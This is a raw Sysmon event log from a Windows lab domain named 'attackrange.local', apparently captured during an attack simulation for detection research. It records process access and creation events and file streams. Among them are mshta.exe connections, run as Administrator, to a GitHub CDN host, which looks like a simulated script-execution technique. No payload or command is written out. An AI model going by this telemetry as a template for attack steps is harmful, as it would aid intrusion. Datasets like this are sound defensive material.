12:25:23.591{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292996Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.590{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292995Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.590{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292994Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.590{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-02B3-6088-152A-00000000BB01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292993Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.590{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-02B3-6088-152A-00000000BB01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000292992Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.465{BEA10069-02B3-6088-152A-00000000BB01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293023Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.950{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49A4446E6D091BF85EED852123E61B06,SHA256=F0CBBAB4F2E4A84523EB09A1306954F7711E109F744E680723A46EE5A4CB4C80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441468Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:24.652{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DCCDA65E49F2659F2101A3AD31F6938,SHA256=9597A2E7BDDA863E8477EF459FC5A0CB36B581361E90247F20AD1C16D5BAD6EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441467Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:24.250{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441466Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:24.250{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293022Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.765{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B2A978AFEE1B6A470A1C6CDE10C6400,SHA256=C30562A1C729978BEC9F238ABC850CFAD6B5BCD32FC586DEB1E59EE87D5C2B67,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293021Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.603{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293020Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.403{BEA10069-02B4-6088-162A-00000000BB01}15006556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000293019Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:19.920{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50656-false185.199.109.133cdn-185-199-109-133.github.com443https 10341000x8000000000000000293018Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.398{BEA10069-D0C3-6086-1E00-00000000BB01}19842836C:\Windows\sysmon64.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293017Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.397{BEA10069-D0C3-6086-1E00-00000000BB01}19842836C:\Windows\sysmon64.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000293016Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:19.917{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50655-false185.199.109.133cdn-185-199-109-133.github.com443https 10341000x8000000000000000293015Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.396{BEA10069-D0C3-6086-1E00-00000000BB01}19842836C:\Windows\sysmon64.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293014Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.396{BEA10069-D0C3-6086-1E00-00000000BB01}19842836C:\Windows\sysmon64.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293013Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.265{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-02B4-6088-162A-00000000BB01}1500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293012Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.265{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293011Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.265{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293010Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.265{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293009Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.265{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293008Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.265{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-02B4-6088-162A-00000000BB01}1500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293007Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.265{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-02B4-6088-162A-00000000BB01}1500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000293006Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:24.265{BEA10069-02B4-6088-162A-00000000BB01}1500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293043Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.952{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AB83E4DA4A737947F04CE4F0FC1FEF2,SHA256=16782AEE1F315916C6B66A0CE1648B24B49B3C18FAA950285000AA66400E2E60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441472Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:25.800{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84DAAD9BC883B9C52E6307842CA252C3,SHA256=4BFE6F800980B47D9BA1E198C3647EAB4419719068FFA67C68B34AB8990828D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441471Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:25.664{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48F483053E77AD03AFEA9AEC75578514,SHA256=9FEAF2A90F0E1F423B2E3DB9C647084850D8A6F0755D983CFEBB79FD462F09C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293042Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.937{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=037B91861E591BEA59FA43A0BE024086,SHA256=A438187F6A17DF67BE88867AD6B3BEDA6AB1C32B29BAFB0B5CC044491C681C2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293041Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.836{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-02B5-6088-182A-00000000BB01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293040Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.836{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293039Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:25.836{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293038Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 